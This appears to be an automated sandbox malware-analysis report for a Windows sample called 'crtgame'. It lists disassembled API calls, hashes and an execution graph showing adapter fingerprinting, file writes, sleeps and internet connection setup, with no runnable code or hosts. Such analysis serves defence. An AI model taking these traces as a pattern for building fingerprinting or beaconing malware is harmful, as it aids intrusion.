                                                                                            • Instruction ID: 6b7d5d1079877a4fdc04a989ad5d4427692f66b21ec07018b92eff91f37320a0
                                                                                            • Opcode Fuzzy Hash: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                                            • Instruction Fuzzy Hash: 47311071A447019BE3308F28DD49B22BBA8E74475AF00423BE155FB3D1E778B9008B0D
                                                                                            APIs
                                                                                            • GetVersionExA.KERNEL32 ref: 00403181
                                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004031B6
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403216
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                            • API String ID: 1385375860-4131005785
                                                                                            • Opcode ID: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                                            • Instruction ID: 0bfe33c8882bc5da799f901860b26a8a70e2baa25249e611fba62494fac00854
                                                                                            • Opcode Fuzzy Hash: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                                            • Instruction Fuzzy Hash: FA3124719052846EEB319A705C55BDA3F6C9B0730AF2404FFD085F92C2E63D8F8A8B19
                                                                                            APIs
                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 004048EB
                                                                                            • GetFileType.KERNEL32(00000800), ref: 00404991
                                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 004049EA
                                                                                            • GetFileType.KERNEL32(00000000), ref: 004049F8
                                                                                            • SetHandleCount.KERNEL32 ref: 00404A2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                                            • String ID:
                                                                                            • API String ID: 1710529072-0
                                                                                            • Opcode ID: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                                            • Instruction ID: 4e5b6c2e9b57b0b0783508239f10a0ad73356ae994103a46a91c1c9ef3db655a
                                                                                            • Opcode Fuzzy Hash: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                                            • Instruction Fuzzy Hash: EF5124F16043608BD7208B38CD447673BA0BB81324F1A473AE6E6FB2E1D73C8855875A
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                                            • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,N@ ,?,00000000,00000000,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$ByteCharMultiWide
                                                                                            • String ID: N@
                                                                                            • API String ID: 352835431-2588724849
                                                                                            • Opcode ID: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
                                                                                            • Instruction ID: 20da4dc5c4367d057857615b5720e39787682ab55b18fc8d36651601e05c1bdf
                                                                                            • Opcode Fuzzy Hash: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
                                                                                            • Instruction Fuzzy Hash: 1C11D432900609ABDF228F94CD44ADFBBB6EB48750F148166FE16721A0D3368D61DF64
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(000000FF,00000000,00008000,@q@,00403D9C,@q@,7591DFF0,?,00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CAB
                                                                                            • HeapFree.KERNEL32(00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CE1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Free$HeapVirtual
                                                                                            • String ID: @q@$@q@
                                                                                            • API String ID: 3783212868-1591251108
                                                                                            • Opcode ID: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                                            • Instruction ID: f6895fdbbb123314fbd550313b942ac7b83e67952c1407439619f49545067eb6
                                                                                            • Opcode Fuzzy Hash: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                                            • Instruction Fuzzy Hash: 88F03431A04210DFD3249F28EE09A427BF4FB08710B014A2AE4A6AB3E1C731AC40CF48
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 0040571A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Info
                                                                                            • String ID: $
                                                                                            • API String ID: 1807457897-3032137957
                                                                                            • Opcode ID: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                                            • Instruction ID: f7edae9c6ae74023553f5d2ec798d7d3c7047796f49532e24c337197b6512109
                                                                                            • Opcode Fuzzy Hash: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                                            • Instruction Fuzzy Hash: 494154320007A85EEB15A724DD49BFB3FA9DB06704F1400F6D946FB192C27949289FAF
                                                                                            APIs
                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 004039D4
                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A08
                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A22
                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3499195154-0
                                                                                            • Opcode ID: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                                            • Instruction ID: 429f96408e1d6026f999a6daa987e4c74961ce2be0a7022420d0a9926faab586
                                                                                            • Opcode Fuzzy Hash: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                                            • Instruction Fuzzy Hash: E4116A702003019FC7218F28EE49E267BB9FB957217184A3AF1D2E71B0D7729961CF09

                                                                                            Execution Graph

                                                                                            Execution Coverage:11.6%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0.6%
                                                                                            Total number of Nodes:351
                                                                                            Total number of Limit Nodes:22
                                                                                            execution_graph 14951 2a84a2a 14952 2ab3c08 SHGetSpecialFolderPathA 14951->14952 14953 2ab800e 14952->14953 14954 2a35f14 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 15033 2a3f1e7 14954->15033 14956 2a35f94 GetTickCount 15042 2a35c39 14956->15042 15220 2a3f29c CreateFileA 15033->15220 15038 2a3f23f CreateFileA 15039 2a3f263 GetFileTime CloseHandle 15038->15039 15040 2a3f28b 15038->15040 15039->15040 15041 2a3f27d 15039->15041 15040->14956 15041->15040 15043 2a429ac _malloc 59 API calls 15042->15043 15044 2a35c4d _memset 15043->15044 15045 2a35c60 SHGetSpecialFolderPathW lstrcpyW lstrcatW CreateFileW 15044->15045 15046 2a35c9f ReadFile CloseHandle 15045->15046 15047 2a35cbe 15045->15047 15048 2a35d04 15046->15048 15235 2a434fb GetSystemTimeAsFileTime 15047->15235 15237 2a355a8 15048->15237 15050 2a35cca CreateFileW 15050->15048 15052 2a35ceb WriteFile CloseHandle 15050->15052 15052->15048 15221 2a3f221 15220->15221 15223 2a3f2cd 15220->15223 15227 2a3f3a0 LoadLibraryA 15221->15227 15222 2a3f2e5 DeviceIoControl 15222->15223 15223->15222 15224 2a3f38e CloseHandle 15223->15224 15225 2a3f35a GetLastError 15223->15225 15226 2a4354c _Allocate 60 API calls 15223->15226 15224->15221 15225->15223 15225->15224 15226->15223 15228 2a3f229 GetWindowsDirectoryA 15227->15228 15229 2a3f3c9 GetProcAddress 15227->15229 15228->15038 15228->15040 15230 2a3f47c FreeLibrary 15229->15230 15233 2a3f3dd 15229->15233 15230->15228 15231 2a3f3ef GetAdaptersInfo 15231->15233 15232 2a3f477 15232->15230 15233->15231 15233->15232 15234 2a4354c _Allocate 60 API calls 15233->15234 15234->15233 15236 2a43529 __aulldiv 15235->15236 15236->15050 15238 2a429ac _malloc 59 API calls 15237->15238 15239 2a355c4 15238->15239 17276 2a6e90c WriteFile 17277 2ac5bdd 17276->17277 17278 2a4370f 17279 2a4371d 17278->17279 17280 2a43718 17278->17280 17284 2a43732 17279->17284 17292 2a4b2e4 17280->17292 17283 2a4372b 17285 2a4373e __initptd 17284->17285 17286 2a437e9 __initptd 17285->17286 17290 2a4378c ___DllMainCRTStartup 17285->17290 17296 2a4359d 17285->17296 17286->17283 17288 2a437c6 17288->17286 17289 2a4359d __CRT_INIT@12 138 API calls 17288->17289 17289->17286 17290->17286 17290->17288 17291 2a4359d __CRT_INIT@12 138 API calls 17290->17291 17291->17288 17293 2a4b314 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17292->17293 17294 2a4b307 17292->17294 17295 2a4b30b 17293->17295 17294->17293 17294->17295 17295->17279 17297 2a435a9 __initptd 17296->17297 17298 2a435b1 17297->17298 17299 2a4362b 17297->17299 17344 2a47be6 GetProcessHeap 17298->17344 17301 2a43694 17299->17301 17302 2a4362f 17299->17302 17304 2a436f7 17301->17304 17305 2a43699 17301->17305 17307 2a43650 17302->17307 17337 2a435ba __initptd __CRT_INIT@12 17302->17337 17445 2a47e5b 17302->17445 17303 2a435b6 17303->17337 17345 2a45794 17303->17345 17308 2a45624 __freeptd 59 API calls 17304->17308 17304->17337 17306 2a48bcb __getptd_noexit TlsGetValue 17305->17306 17310 2a436a4 17306->17310 17448 2a47d32 RtlDecodePointer 17307->17448 17308->17337 17315 2a4846e __calloc_crt 59 API calls 17310->17315 17310->17337 17313 2a435c6 __RTC_Initialize 17321 2a435d6 GetCommandLineA 17313->17321 17313->17337 17318 2a436b5 17315->17318 17316 2a43666 __CRT_INIT@12 17472 2a4367f 17316->17472 17322 2a48bea __getptd_noexit TlsSetValue 17318->17322 17318->17337 17319 2a4af7f __ioterm 60 API calls 17320 2a43661 17319->17320 17323 2a4580a __mtterm 62 API calls 17320->17323 17366 2a4b380 GetEnvironmentStringsW 17321->17366 17325 2a436cd 17322->17325 17323->17316 17328 2a436d3 17325->17328 17329 2a436eb 17325->17329 17332 2a456e1 __initptd 59 API calls 17328->17332 17331 2a42974 __mtterm 59 API calls 17329->17331 17330 2a435f0 17333 2a435f4 17330->17333 17398 2a4afd4 17330->17398 17331->17337 17334 2a436db GetCurrentThreadId 17332->17334 17431 2a4580a 17333->17431 17334->17337 17337->17290 17339 2a43614 17339->17337 17440 2a4af7f 17339->17440 17344->17303 17476 2a47f02 RtlEncodePointer 17345->17476 17347 2a45799 17481 2a48420 17347->17481 17350 2a457a2 17351 2a4580a __mtterm 62 API calls 17350->17351 17353 2a457a7 17351->17353 17353->17313 17355 2a457bf 17356 2a4846e __calloc_crt 59 API calls 17355->17356 17357 2a457cc 17356->17357 17358 2a45801 17357->17358 17359 2a48bea __getptd_noexit TlsSetValue 17357->17359 17360 2a4580a __mtterm 62 API calls 17358->17360 17361 2a457e0 17359->17361 17362 2a45806 17360->17362 17361->17358 17363 2a457e6 17361->17363 17362->17313 17364 2a456e1 __initptd 59 API calls 17363->17364 17365 2a457ee GetCurrentThreadId 17364->17365 17365->17313 17367 2a4b393 WideCharToMultiByte 17366->17367 17368 2a435e6 17366->17368 17370 2a4b3c6 17367->17370 17371 2a4b3fd FreeEnvironmentStringsW 17367->17371 17379 2a4accb 17368->17379 17372 2a484b6 __malloc_crt 59 API calls 17370->17372 17371->17368 17373 2a4b3cc 17372->17373 17373->17371 17374 2a4b3d3 WideCharToMultiByte 17373->17374 17375 2a4b3f2 FreeEnvironmentStringsW 17374->17375 17376 2a4b3e9 17374->17376 17375->17368 17377 2a42974 __mtterm 59 API calls 17376->17377 17378 2a4b3ef 17377->17378 17378->17375 17380 2a4acd7 __initptd 17379->17380 17381 2a482ef __lock 59 API calls 17380->17381 17382 2a4acde 17381->17382 17383 2a4846e __calloc_crt 59 API calls 17382->17383 17384 2a4acef 17383->17384 17385 2a4ad5a GetStartupInfoW 17384->17385 17386 2a4acfa __initptd @_EH4_CallFilterFunc@8 17384->17386 17392 2a4ad6f 17385->17392 17395 2a4ae9e 17385->17395 17386->17330 17387 2a4af66 17489 2a4af76 17387->17489 17389 2a4846e __calloc_crt 59 API calls 17389->17392 17390 2a4aeeb GetStdHandle 17390->17395 17391 2a4aefe GetFileType 17391->17395 17392->17389 17394 2a4adbd 17392->17394 17392->17395 17393 2a4adf1 GetFileType 17393->17394 17394->17393 17394->17395 17396 2a48c0c ___lock_fhandle InitializeCriticalSectionAndSpinCount 17394->17396 17395->17387 17395->17390 17395->17391 17397 2a48c0c ___lock_fhandle InitializeCriticalSectionAndSpinCount 17395->17397 17396->17394 17397->17395 17399 2a4afe7 GetModuleFileNameA 17398->17399 17400 2a4afe2 17398->17400 17402 2a4b014 17399->17402 17499 2a44c8a 17400->17499 17493 2a4b087 17402->17493 17405 2a484b6 __malloc_crt 59 API calls 17406 2a4b04d 17405->17406 17407 2a4b087 _parse_cmdline 59 API calls 17406->17407 17408 2a43600 17406->17408 17407->17408 17408->17339 17409 2a4b203 17408->17409 17410 2a4b20c 17409->17410 17414 2a4b211 _vscan_fn 17409->17414 17411 2a44c8a ___initmbctable 71 API calls 17410->17411 17411->17414 17412 2a43609 17412->17339 17425 2a47e6a 17412->17425 17413 2a4846e __calloc_crt 59 API calls 17415 2a4b247 _vscan_fn 17413->17415 17414->17412 17414->17413 17415->17412 17416 2a4b299 17415->17416 17418 2a4846e __calloc_crt 59 API calls 17415->17418 17419 2a4b2c0 17415->17419 17422 2a4b2d7 17415->17422 17621 2a466bc 17415->17621 17417 2a42974 __mtterm 59 API calls 17416->17417 17417->17412 17418->17415 17420 2a42974 __mtterm 59 API calls 17419->17420 17420->17412 17423 2a44905 __invoke_watson 8 API calls 17422->17423 17424 2a4b2e3 17423->17424 17426 2a47e76 __IsNonwritableInCurrentImage 17425->17426 17630 2a4ccdf 17426->17630 17428 2a47e94 __initterm_e 17429 2a42da4 __cinit 68 API calls 17428->17429 17430 2a47eb3 _doexit __IsNonwritableInCurrentImage 17428->17430 17429->17430 17430->17339 17432 2a45814 17431->17432 17434 2a4581a 17431->17434 17633 2a48bac 17432->17633 17435 2a48339 RtlDeleteCriticalSection 17434->17435 17436 2a48355 17434->17436 17437 2a42974 __mtterm 59 API calls 17435->17437 17438 2a48361 RtlDeleteCriticalSection 17436->17438 17439 2a48374 17436->17439 17437->17434 17438->17436 17439->17337 17441 2a4af86 17440->17441 17442 2a4afce 17441->17442 17443 2a42974 __mtterm 59 API calls 17441->17443 17444 2a4af9f RtlDeleteCriticalSection 17441->17444 17442->17333 17443->17441 17444->17441 17446 2a47fa6 _doexit 59 API calls 17445->17446 17447 2a47e66 17446->17447 17447->17307 17449 2a47d5e 17448->17449 17450 2a47d4c 17448->17450 17451 2a42974 __mtterm 59 API calls 17449->17451 17450->17449 17452 2a42974 __mtterm 59 API calls 17450->17452 17453 2a47d6b 17451->17453 17452->17450 17454 2a47d8f 17453->17454 17456 2a42974 __mtterm 59 API calls 17453->17456 17455 2a42974 __mtterm 59 API calls 17454->17455 17457 2a47d9b 17455->17457 17456->17453 17458 2a42974 __mtterm 59 API calls 17457->17458 17459 2a47dac 17458->17459 17460 2a42974 __mtterm 59 API calls 17459->17460 17461 2a47db7 17460->17461 17462 2a47ddc RtlEncodePointer 17461->17462 17465 2a42974 __mtterm 59 API calls 17461->17465 17463 2a47df1 17462->17463 17464 2a47df7 17462->17464 17466 2a42974 __mtterm 59 API calls 17463->17466 17467 2a47e0d 17464->17467 17470 2a42974 __mtterm 59 API calls 17464->17470 17469 2a47ddb 17465->17469 17466->17464 17468 2a43655 17467->17468 17471 2a42974 __mtterm 59 API calls 17467->17471 17468->17316 17468->17319 17469->17462 17470->17467 17471->17468 17473 2a43691 17472->17473 17474 2a43683 17472->17474 17473->17337 17474->17473 17475 2a4580a __mtterm 62 API calls 17474->17475 17475->17473 17477 2a47f13 __init_pointers __initp_misc_winsig 17476->17477 17488 2a43407 RtlEncodePointer 17477->17488 17479 2a47f2b __init_pointers 17480 2a48c7a 34 API calls 17479->17480 17480->17347 17482 2a4842c 17481->17482 17483 2a48c0c ___lock_fhandle InitializeCriticalSectionAndSpinCount 17482->17483 17484 2a4579e 17482->17484 17483->17482 17484->17350 17485 2a48b8e 17484->17485 17486 2a48ba5 TlsAlloc 17485->17486 17487 2a457b4 17485->17487 17487->17350 17487->17355 17488->17479 17492 2a48459 RtlLeaveCriticalSection 17489->17492 17491 2a4af7d 17491->17386 17492->17491 17495 2a4b0a9 17493->17495 17498 2a4b10d 17495->17498 17503 2a50fd6 17495->17503 17496 2a4b02a 17496->17405 17496->17408 17497 2a50fd6 _parse_cmdline 59 API calls 17497->17498 17498->17496 17498->17497 17500 2a44c9a 17499->17500 17501 2a44c93 17499->17501 17500->17399 17509 2a44fe7 17501->17509 17506 2a50f7c 17503->17506 17507 2a41c7b _LocaleUpdate::_LocaleUpdate 59 API calls 17506->17507 17508 2a50f8e 17507->17508 17508->17495 17510 2a44ff3 __initptd 17509->17510 17511 2a4565a __CreateFrameInfo 59 API calls 17510->17511 17512 2a44ffb 17511->17512 17513 2a44f41 __setmbcp 59 API calls 17512->17513 17514 2a45005 17513->17514 17534 2a44ce2 17514->17534 17517 2a484b6 __malloc_crt 59 API calls 17518 2a45027 17517->17518 17519 2a45154 __initptd 17518->17519 17541 2a4518f 17518->17541 17519->17500 17522 2a45164 17522->17519 17524 2a42974 __mtterm 59 API calls 17522->17524 17527 2a45177 17522->17527 17523 2a4505d 17526 2a42974 __mtterm 59 API calls 17523->17526 17528 2a4507d 17523->17528 17524->17527 17525 2a4585b __wsopen_helper 59 API calls 17525->17519 17526->17528 17527->17525 17528->17519 17529 2a482ef __lock 59 API calls 17528->17529 17530 2a450ac 17529->17530 17531 2a4513a 17530->17531 17533 2a42974 __mtterm 59 API calls 17530->17533 17551 2a45159 17531->17551 17533->17531 17535 2a41c7b _LocaleUpdate::_LocaleUpdate 59 API calls 17534->17535 17536 2a44cf2 17535->17536 17537 2a44d01 GetOEMCP 17536->17537 17538 2a44d13 17536->17538 17540 2a44d2a 17537->17540 17539 2a44d18 GetACP 17538->17539 17538->17540 17539->17540 17540->17517 17540->17519 17542 2a44ce2 getSystemCP 61 API calls 17541->17542 17545 2a451ac 17542->17545 17543 2a451b3 setSBCS 17544 2a43f4b setSBUpLow 6 API calls 17543->17544 17546 2a4504e 17544->17546 17545->17543 17547 2a451fd IsValidCodePage 17545->17547 17550 2a45222 _memset __setmbcp_nolock 17545->17550 17546->17522 17546->17523 17547->17543 17548 2a4520f GetCPInfo 17547->17548 17548->17543 17548->17550 17554 2a44daf GetCPInfo 17550->17554 17620 2a48459 RtlLeaveCriticalSection 17551->17620 17553 2a45160 17553->17519 17555 2a44de7 17554->17555 17556 2a44e91 17554->17556 17564 2a4d61d 17555->17564 17559 2a43f4b setSBUpLow 6 API calls 17556->17559 17561 2a44f3d 17559->17561 17561->17543 17563 2a4d4c1 ___crtLCMapStringA 63 API calls 17563->17556 17565 2a41c7b _LocaleUpdate::_LocaleUpdate 59 API calls 17564->17565 17566 2a4d62e 17565->17566 17574 2a4d525 17566->17574 17569 2a4d4c1 17570 2a41c7b _LocaleUpdate::_LocaleUpdate 59 API calls 17569->17570 17571 2a4d4d2 17570->17571 17591 2a4d2bd 17571->17591 17575 2a4d54c MultiByteToWideChar 17574->17575 17576 2a4d53f 17574->17576 17578 2a4d578 17575->17578 17586 2a4d571 17575->17586 17576->17575 17577 2a43f4b setSBUpLow 6 API calls 17579 2a44e48 17577->17579 17580 2a4d59a _memset 17578->17580 17582 2a429ac _malloc 59 API calls 17578->17582 17579->17569 17581 2a4d5d6 MultiByteToWideChar 17580->17581 17580->17586 17583 2a4d600 17581->17583 17584 2a4d5f0 GetStringTypeW 17581->17584 17582->17580 17587 2a4d507 17583->17587 17584->17583 17586->17577 17588 2a4d511 17587->17588 17589 2a4d522 17587->17589 17588->17589 17590 2a42974 __mtterm 59 API calls 17588->17590 17589->17586 17590->17589 17592 2a4d2d6 MultiByteToWideChar 17591->17592 17599 2a4d33c 17592->17599 17604 2a4d335 17592->17604 17594 2a43f4b setSBUpLow 6 API calls 17597 2a44e69 17594->17597 17595 2a4d39b MultiByteToWideChar 17598 2a4d3b4 17595->17598 17608 2a4d402 17595->17608 17596 2a4d364 17596->17595 17596->17604 17597->17563 17616 2a4f0e8 17598->17616 17599->17596 17602 2a429ac _malloc 59 API calls 17599->17602 17601 2a4d507 __freea 59 API calls 17601->17604 17602->17596 17603 2a4d3c8 17605 2a4d3de 17603->17605 17607 2a4d40a 17603->17607 17603->17608 17604->17594 17606 2a4f0e8 __crtLCMapStringA_stat LCMapStringW 17605->17606 17605->17608 17606->17608 17610 2a429ac _malloc 59 API calls 17607->17610 17613 2a4d432 17607->17613 17608->17601 17609 2a4f0e8 __crtLCMapStringA_stat LCMapStringW 17611 2a4d475 17609->17611 17610->17613 17612 2a4d49d 17611->17612 17615 2a4d48f WideCharToMultiByte 17611->17615 17614 2a4d507 __freea 59 API calls 17612->17614 17613->17608 17613->17609 17614->17608 17615->17612 17617 2a4f113 __crtLCMapStringA_stat 17616->17617 17618 2a4f0f8 17616->17618 17619 2a4f12a LCMapStringW 17617->17619 17618->17603 17619->17603 17620->17553 17622 2a466d5 17621->17622 17623 2a466c7 17621->17623 17624 2a4585b __wsopen_helper 59 API calls 17622->17624 17623->17622 17628 2a466eb 17623->17628 17625 2a466dc 17624->17625 17626 2a448f5 __wsopen_helper 9 API calls 17625->17626 17627 2a466e6 17626->17627 17627->17415 17628->17627 17629 2a4585b __wsopen_helper 59 API calls 17628->17629 17629->17625 17631 2a4cce2 RtlEncodePointer 17630->17631 17631->17631 17632 2a4ccfc 17631->17632 17632->17428 17634 2a48bc3 TlsFree 17633->17634 17635 2a48bbf 17633->17635 17634->17434 17635->17434 17636 2ab3b75 CloseHandle 17637 2ab855e 17636->17637 17638 2a3104d 17639 2a42da4 __cinit 68 API calls 17638->17639 17640 2a31057 17639->17640 17643 2a31aa9 InterlockedIncrement 17640->17643 17644 2a31ac5 WSAStartup InterlockedExchange 17643->17644 17645 2a3105c 17643->17645 17644->17645
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.NTDLL(02A673D8), ref: 02A35F43
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02A35F5A
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02A35F63
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02A35F72
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02A35F75
                                                                                              • Part of subcall function 02A3F1E7: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02A3F235
                                                                                              • Part of subcall function 02A3F1E7: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02A3F256
                                                                                              • Part of subcall function 02A3F1E7: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02A3F26A
                                                                                              • Part of subcall function 02A3F1E7: CloseHandle.KERNEL32(00000000), ref: 02A3F273
                                                                                            • GetTickCount.KERNEL32 ref: 02A35FB6
                                                                                            • GetVersionExA.KERNEL32(02A67030), ref: 02A35FE3
                                                                                            • _memset.LIBCMT ref: 02A36000
                                                                                            • _malloc.LIBCMT ref: 02A3600D
                                                                                            • _malloc.LIBCMT ref: 02A3601D
                                                                                            • _malloc.LIBCMT ref: 02A3602B
                                                                                            • _malloc.LIBCMT ref: 02A36036
                                                                                            • _malloc.LIBCMT ref: 02A36041
                                                                                            • _malloc.LIBCMT ref: 02A3604C
                                                                                            • _malloc.LIBCMT ref: 02A36057
                                                                                            • _malloc.LIBCMT ref: 02A36066
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02A3607D
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02A36086
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02A36095
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02A36098
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02A360A3
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02A360A6
                                                                                            • _memset.LIBCMT ref: 02A360B9
                                                                                            • _memset.LIBCMT ref: 02A360C5
                                                                                            • _memset.LIBCMT ref: 02A360D2
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A360E0
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A360ED
                                                                                            • _malloc.LIBCMT ref: 02A36111
                                                                                              • Part of subcall function 02A429AC: __FF_MSGBANNER.LIBCMT ref: 02A429C3
                                                                                              • Part of subcall function 02A429AC: __NMSG_WRITE.LIBCMT ref: 02A429CA
                                                                                              • Part of subcall function 02A429AC: RtlAllocateHeap.NTDLL(00920000,00000000,00000001), ref: 02A429EF
                                                                                            • _malloc.LIBCMT ref: 02A3611F
                                                                                            • _malloc.LIBCMT ref: 02A36126
                                                                                            • _malloc.LIBCMT ref: 02A3614A
                                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02A3615A
                                                                                            • Sleep.KERNELBASE ref: 02A36168
                                                                                            • _malloc.LIBCMT ref: 02A36174
                                                                                            • _malloc.LIBCMT ref: 02A36181
                                                                                            • _memset.LIBCMT ref: 02A36196
                                                                                            • _memset.LIBCMT ref: 02A361A6
                                                                                            • Sleep.KERNELBASE(00001388), ref: 02A361C2
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A361CD
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A361DE
                                                                                            • _memset.LIBCMT ref: 02A36233
                                                                                            • _memset.LIBCMT ref: 02A36242
                                                                                            • GetTickCount.KERNEL32 ref: 02A362E5
                                                                                            • _memset.LIBCMT ref: 02A3630F
                                                                                            • wsprintfA.USER32 ref: 02A36C3B
                                                                                            • _memset.LIBCMT ref: 02A36C5C
                                                                                            • _memset.LIBCMT ref: 02A36C6C
                                                                                            • _memset.LIBCMT ref: 02A36C9B
                                                                                            • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02A36D3D
                                                                                            • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02A36D65
                                                                                            • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02A36D7D
                                                                                            • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02A36D95
